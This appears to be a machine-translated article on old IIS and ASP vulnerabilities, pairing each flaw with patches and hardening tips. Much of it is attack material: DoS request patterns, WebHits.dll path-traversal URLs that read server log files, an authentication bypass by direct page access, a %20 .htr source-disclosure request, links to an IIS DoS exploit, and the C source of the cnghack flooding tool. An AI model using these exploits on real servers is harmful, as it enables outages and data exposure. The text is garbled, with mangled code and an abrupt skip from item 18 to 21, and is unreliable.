ASP vulnerability and security recommendations

11, Vulnerability Name: IIS4.0 is described by HTTP DOS Attack Vulnerability Problem: The affected version: IIS 4.0 and earlier versions This is a very simple method. Send a lot of "Host: aaaaa ... aa" to IIS: Get / http / 1.1 Host: Aaaaaaaaaaaaaaaaaaaaaa .... (200 Bytes) Host: Aaaaaaaaaaaaaaaaaaaaa .... (200 Bytes) ... 10,000 Lines Host: Aaaaaaaaaaaaaaaaaaaaaa .... (200 Bytes) Send like the above After the two requests written, the other party's IIS will cause memory overflow after accepting these requests. Of course, it cannot respond to more requests. Because the other party is lacking virtual memory, the server will also stop running. Afterwards, the other party cannot solve the problem by restarting Web Service, but must restart the server. 12 Vulnerability Name: IIS5.0 Ultra Long URL Denial Service Vulnerability Problem Description: Microsoft IIS 5.0 There is two results when processing URL requests with ".ida" as the extension. One possible result is the information of the server to reply "URL STRING TOON"; or similar to "Cannot Find The Specified Path". Another possibility is that the server-side service is stopped and returns "Access Viological" information (that is, the successful implementation of the rejection service attack on the server) When the remote attacker issues a similar request: http: // someurl / .. [25KB

Of '.'] ... IDA Server Club crashes (causing a denial of service attack) or returning to this file is not in the current path (exposure file physical address) problem resolution or suggestion: Most cases, sites rarely use extensions For ".ida" and ".idq" files, you can delete the extension ".ida" and ".idq" application in the ISAPI script map. 13 The extension of the request is not extension is IDQ or IDA file, exposes the server on the server. Problem Description: By requesting an unssenced extension IDQ or IDA to get file, IIS exposes the file on the server to the server. This will provide an unnecessary information to an attacker, and this is a very valuable first step for attacking a Web site. Test procedure: You can receive similar: 'The IDQ D: /Http/aNything.idq could not be found 'response. Such a response will allow an attacker to get the physical path to the Web site, and you can get more organizations and structures about the site on the server. 14. NT Index Server There is a vulnerability problem that returns the superior directory Description The affected version: Microsoft Index Server 2.0 [WinNT4.0, Winnt 2000.0] index sserver2.0 is a tool for a software included in Winnt 4.0 Option Pack, where The function has been included in Indexing Services in WinNT 2000. When used in conjunction with IIS, INDEX Server and Indexing Services can browse the result of the web search in the original environment, which will generate an HTML file, which contains a short reference to the content returned to the page after searching, and connect it to The returned page [ie pages that meet the query content], that is, the super connection. To do this, it needs to support the .htw file type by the WebHits.dll Isapi program. This DLL allows ".." to be used in a template to return a string that returns the superior directory. This way, an attacker under the server file structure can be remotely read any files on the machine. Vulnerability Utilization: 1) This super connection exists in your system. HTW file Index Server provides the web user to get a return page about his search results, this page's name is through the .htw file with the CIWebhitsFile variable, WebHits.dll This ISAPI program will handle this request, which is super-connected and returned to this page. Therefore, the user can control the CiWeBHITS variable of the .htw file requests any desired information. One problem in existence is that the source code for ASP or other script files can also be obtained.

Above we said that "../" can be accessed by "../", we can access the file outside the web virtual directory. Let's take an example: http://somerul/iissample/issample/oop/qfullhit.dll? CiWebhitsFile = / .. / .. / Winnt / System32 / logfiles / w3svc1 / es000121.log & Cirestriction = None & CiHILITYPE = FULL Enter the web log file for the date on the server. It is common in the system. HTW sample files are: /iissample/issample/oop/qfullhit.htw /iissample/issamples/oop/Qsumrhit.htw /iissample/exair/search/QFullHit.htw /iissample/exair/search/Qsumrhit.hw / Iishelp / IIS / MISC / IIRTURNH.HTW [This file is usually limited by Loopback] 2) There is no .htw file call a webhits.dll isapi program in your system, if you don't exist .htw file in your system, Although requesting a .htw file will fail, you still have a vulnerability that can be utilized. The trick is to use inetinfo.exe to call WebHits.dll, which can also access files outside the web virtual directory. But we need to complete the exploitation of this vulnerability by making a special URL. First we need a valid file resource, this file must be a static file, such as ".htm", "HTML", ". TXT" or ".gif", ". Jpg". These files will be used as a template to be opened by WebHits.dll. Now we need to get inetinfo.exe to use WebHits.dll, the only thing you can do is to ask a .htw file: http://url/default.htm.htw? CiWebhitsFile = / .. / .. / Winnt /system32/logfiles/w3svc1/ex000121.log&cirestriction=none&cihilitetype=Full is obvious, this request will definitely fail because there is no such file on the system. But please note that we have called now to WebHits.dll, we only need to be behind a file resource [也 .htw front] plus a string of special numbers (% 20s), [is default.htm in the example Behind this representative space special number], so we can deceive the web server to achieve our goal. Since the HTW file name part is deleted in the buffer section [due to% 20s symbol], When transferring to WebHits.dll, the file can be successfully opened and returned to the client, and the process does not require a real .htw file in the system. Problem Solutions and Suggestions: Microsoft has issued patch on this issue: INDEX Server 2.0: Intel: http://www.microsoft.com/downloads/release.asp? Releaseid = 17727

Alpha:

Http://www.microsoft.com/downloads/release.asp?releaseid=17728

Windows 2000 Indexing Services: Intel:

http://www.microsoft.com/downloads/release.asp?releaseid=17726

15 Repair the verification directly into the ASP page. Vulnerability Description: If the user knows the path and file name of an ASP page, this file is to be verified, but the user directly enters the file name of this ASP page, it is possible to pass the verification. For example: I I tried this on some websites: First close all browsers, windows, enter: http: //someurl/system_search.asp? Page = 1 When you see that you can only see the system can see. Of course, some people will also add a judgment in the beginning of SYSTEM_SEARCH.ASP in order to prevent this, such as judge the session ("system_name"), if not empty, so that the above URL request cannot directly enter the administrator Page. However, this method also has a vulnerability. If the attacker first uses a legal account, or generates a session on this machine, such as session ("system_name") = "admi", because session ("system_name" is not empty This can also directly enter the password, directly into the administrator page. Workaround: Perform appropriate processing at the beginning of the ASP page that needs to be verified. For example: track the file name of the previous page, only the session that is transferred from the previous page can read this page. 16, IIS4.0 / 5.0 Special data format URL Remote DOS Attack Vulnerability Description: When there is a web service with IIS4.0 or IIS5.0 installed, request a URL with special data format, which will slow down attack The response speed of the web server may make it temporarily stopped. Affected versions of Microsoft Internet Information Server 4.0 Microsoft Internet Information Server 5.0 vulnerability testing procedure is as follows: http://202.96.168.51/download/exploits/iisdos.exe source code is as follows: http://202.96.168.51/download/exploits/ IISDOS.ZIP Test Program: Just be to: IISDOS <***. ***. **. **> You can attack the other party Web server problem Solution: Internet Information Server 4.0: http://www.microsoft.com/ DownloadS / RELESE.ASP? ReleaseID = 20906 Internet Information Server 5.0: http://www.microsoft.com/downloads/release.asp?releaseid=20904 More information: http://www.microsoft.com/technet/ Security / Bulletin / MS00-030.asp Microsoft Security Announcement MS00-021: http://www.microsoft.com/technet/security/bulletin/fq00-030.asp related connection http://www.ussrback.com 17 IIS Web Server DOS Vulnerability Description: By default, IIS is easy to be denied service attacks. If a key called "MaxClientRequestBuffer" in the registry is not created, attacks for this NT system can usually work. "MaxClientRequestBuffer" This button is used to set the IIS allowed the acceptable input. If "MaxClientRequestBuffer is set to 256 (bytes), the attacker will be restricted within 256 bytes by entering a large number of character requests IIS.

The default setting of the system is not limited to this, so the following programs are utilized.

You can easily implement DOS attacks on IIS Server: #include #include #define max_thread 666 void cng (); char * server; char * buffer; int port; int counter = 0; INT current_threads = 0; int Main (int Argc, char ** argv) {Word Tequila; Wsadata Data; INT P; DWORD TID; Handle Hthread [2000]; // This Code is as AND sucks as it is. won ' TEIT CORRECTLY AND A LOT OF Other Fun Things. // That I Didn't Want To Take The Time To Do. So Just Ctrl C Out of The Code. // Load Up Cnghack.exe 3 Times for Charm. Printf "CNG IIS dos./nmarc@eeye.com/nhttp://www.eeye.com/n/"for my beloved./"/n"); if (argc <2) {printf ("USAGE:% s [port] / n ", argv [0]); exit (1);} buffer = malloc (17500); MEMSET (Buffer, 'A', Strlen); Server = Argv [1]; Port = atoi (Argv [2]); Tequila = MakeWord (1, 1); Printf ("Attempting to Start Winsock ..."); IF ((WsaStartup (Tequila, & Data))! = 0) {Printf (" Failed to start winsock./N "); exit (1);} else {printf (" started winsock./n/n ");} counter = 0; for (p = 0; p

Dstsain.sin_addr.s_addr = inet_addr (server); if ((SockFD = Socket (AF_INET, SOCK_STREAM, 0) <0) {PrintF ("Failed to Create Socket / N"); --current_threads; return;} = CONNECT (Sockfd, (Struct SockAddr *) & dstsain, Sizeof (DSTSAIN))) {P = Send (SockFD, Getkilled, Strlen (getkilled), 0); Printf ("Step 1:% I / N", P); For (;;) {p = send (sockfd, buffer, strlen (buffer), 0); Printf ("p:% I / n", p); // put in some code to check if send = -1 more THEN X TIMES We Drop The loop and exit the thread // Blalla Blal I love the dirtiness of concepter code.}; printf ("EXITED CNG / N"); Return;} cnghack.c Works by doing the FOLLOWING: CONNECTS TO EXAMPLE.COM Sends: get / http / [return] [buffer] where: [RETURN] IS JUST AN / R / N [buffer] IS A NEVER Ending Stream of A'S attack results will cause the NT system's CPU occupation rate of 100% solution runs in Regedt32.exe: HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / w3svc / parameters to add a value: value Name: MaxClientRequestBuffer Data Type: REG_DWORD set to decimal specific value you want to set IIS to allow acceptance The URL maximum length. CNNS set to 256 18, MS ODBC database connection overflow causes NT / 9X Deny Service Attack Vulnerable Cave Description: The Microsoft ODBC database may have potential overflow issues (Microsoft Access Database) in connection and disconnection. If you do not cancel the connection, you can directly connect directly to the second database, it may cause the service to stop.

Impact System: ODBC Version: 3.510.3711.0 ODBC Access Drive Version: 3.51.1029.00 OS Version: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386) Microsoft Office 97 Professional (mso97.dll: 8.0.0.3507) Vulnerability detection method is as follows: ODBC connection source name: Miscdb odbc database model: MS Access ODBC assumption path: D: /DATA/Misc.mdb ASP code as follows: <% set connvb = server.createObject ("adoDb.connection" connvb.open "driver = { Microsoft Access Driver (* .mdb)}; DSN = Miscdb "%> ... LOTS of HTML Removed ..." Rename "), such as change to hkey_classes_root / scripting.filesystemObject2, in ASP This object must be referenced: set fso = createObject ("scripting.filesystemObject2) instead of: set fso = createObject (" scripting.filesystemObject ") If you use the usual method to call the FileSystemObject object will not be used. As long as you don't tell others this changed object name, others cannot use the FileSystemObject object. In this way, as a site manager, we will put an illegal use of the FileSystemObject object, and we can still use this object to make it easy to implement the website online management! 21 IIS4.0 / IIS5.0 Ultra-long file name request presence vulnerability vulnerability description: Affected version: Microsoft IIS 5.0 Microsoft Windows NT 2000 Microsoft IIS 4.0 Microsoft Windows NT 4.0 Microsoft BackOffice 4.0 Microsoft Windows NT 4.0 Microsoft BackOffice 4.0 Microsoft Windows NT 4.0 When adding 230 "% 20" after a known file name, add a .htr, the content of the file is installed with Microsoft IIS 4.0 / 5.0. This is caused by ISM.dll map. Such as http: // target / filename% 20 .htr This request is only when the .htr request is the first call or ism.dll Once loading, memory can work.

Solution: install the patch Microsoft IIS 5.0: http://download.microsoft.com/download/win2000platform/Patch/Q249599/NT5/EN-US/Q249599_W2K_SP1_X86_en.EXE Microsoft IIS 4.0: http://download.microsoft.com/ Download / IIS40 / PATCH / Q260838 / NT4I.EXE 22 ASP editor automatically backed up ASP files, which will be downloaded: Vulnerability Vulnerabilities in Some Edit ASP Programs, Create or Modify A ASP file When the editor automatically creates a backup file, such as: UltraEdit will back up a ..bak file, such as you create or modify some.asp, the editor automatically generates a some.asp.bak file, if you don't delete this BAK file, the attack can download some.asp.bak files directly, so that Some.asp's source program will be downloaded. How can Six ASP security recommendations to make ASP more secure? The following focuses on talking about the issues of ASP security. We also propose corresponding security recommendations in the fifth part of "ASP Vulnerabilities and Solutions", which also puts forward corresponding security recommendations. This part will no longer repeat. Along the following, you will also introduce some tools that scan the ASP vulnerability. 1 Installing NT latest patches The latest patch is NT Option Pack 6.0., Microsoft's homepage has the latest patches. Generally, Microsoft will promptly publish the latest vulnerabilities and patches. At present, IIS is 5.0. Windows2000 comes with IIS5.0. IIS 5.0 The new features are as follows: Security: including summary verification, integrated Windows authentication, SGC (Server-Gated Cryptography), Microsoft Certificate Services 2.0, the program protector of the central processing program. Management: including IIS reactivation, stop CPU usage time limit, CPU resource usage record, using Terminal Services remotely manages IIS, self-book error message, etc. Internet standards: including WebDAV (Web Distributed Authoring and Version, FTP Reactive, HTTP compression, etc. Active Server Pages: Includes a new steering method (Server.Transfer and Server.execute method), new error handling function (server.getlasterror method), no instructions .Anp execution speed, can be upgraded to the function of the installation component, Scriptlet support, use cookies to get browser information, automatic reduction and decryption (Executing Threads), SRC server-side contain features, Script Encoder encoding protection, etc. For more specific features, please refer to other information. 2 Turn off the service and protocol "" Try to use the service ", this is always a criterion for network security. If you open a service, you have to face a lot of vulnerability, more importantly, you still have to fade the future of the vulnerability caused by this service. For example, if you don't use FTP, then turn the FTP, or you have to pay a lot of energy and money to deal with the vulnerabilities such as DOS, buffer overflow. NetBIOS is also a major security hazard in Windows, I think the server is rarely need NetBIOS. As your IIS has installed Index Server service, you must at least face more than three of the vulnerabilities about this service, so if you don't use the INDEX Server service, you can delete him. The same reason, we have to install Minimum protocol. Don't install point-to-point channel communication protocol. In addition, you must also configure the TCP / IP protocol.

Select the IP Address item in the Properties page of TCP / IP and select Advanced. Select "Security Mechanism" in the pop-up dialog box so you can disable UDP, then turn on IP port 6 and TCP port 80. Of course, it is mainly to see your situation. The application map in IIS is also a big security vulnerability, set the extension and executable path in IIS, and delete the unused extension. 3 Set your NT NT default installation, system account administrator and guest are set automatically, and many attackers use these accounts to guess the password, so that you enter your system. Although there is not enough patience, it is difficult to guess these passwords, but for safety reasons, it is recommended to rename or delete these accounts. NT Server's System Policy Editor is very useful. Press "Management Tool" -> System Policy Editor "to enter, then select File ->" Open Registry ", and select the Local Computer icon, you can be carefully configured. Mainly set the following: Cancel: Network -> System Rule Update -> Remote Update Cancel: Windows NT Network -> Share -> Creating Hidden Drive Sharing Settings: Windows NT Remote Access The following settings: Windows NT System -> Log in to each item. Including setting login tags; not allowing from "Authentication dialog" to shut down; not displayed last logged in username. Setting: Windows NT System -> File System "Do not create a 8.3 file name" Do not use remote Manage software unless it is not necessary. Since NT does not support remote management, you might install Reachout or PC Anywhere to manage. However, when you have these software installed, you have to turn on all ports of TCP / IP. When you leave the server, press "Ctrl Del Alt" and select "Lock Workstation". 4 Disk file format Use a relatively secure NTFS format. NTFS permissions are the basis for web server security, which defines a different level of one or a group of users access files and directories. When a user with a Windows NT valid account attempts to access a file with permission restrictions, the computer will check the file access control table (ACL). This table defines the permissions given by different users and user groups. For example, the owner of the web application on the web server needs to have "change" permissions to view, change, and delete the application's .asp file. However, public users accessing the application should only be granted "read-only" permissions to limit them to only view and cannot change the web page. 5 Set different properties to the directory, such as: Read, Excute, Script. You can limit all users to view, run, and proceed for your ASP page by configuring your Web Server. Unlike NTFS permissions, the control specific user is accessible to application files and directories, and web server rights apply to all users, and does not distinguish the type of user account. For users to run your ASP application, when setting up web server permissions, you must follow the following principles: Allow "Read" or "Script" permission to include .asp files. For the .asp file and other files that include scripts (such as .htm files, etc.) allow "read" and "script" permissions. Configuring the "Read" and "Execution" permissions for files that contain .asp files and other files that need to be "executed", such as .DLL files, etc..

6 Maintaining Global.asa Safety To fully protect the ASP application, you must set NTFS file permissions to the appropriate user or user group on the application's global.asa file. If Global.asa contains commands to return information to the browser, you do not protect the global.asa file, the information will be returned to the browser, even if the application's other files are protected. 7 Do not write your password, physical paths directly in the program. It is difficult to ensure that your ASP program will give people, even if you have the latest patches. For security reasons, you should save your password and username in the database and use the virtual path. 8 Record the user's details in the program. This information includes the user's browser, the user's stay, the user IP, etc. The record IP is most useful. The following statement is available to understand the information of the client and the server: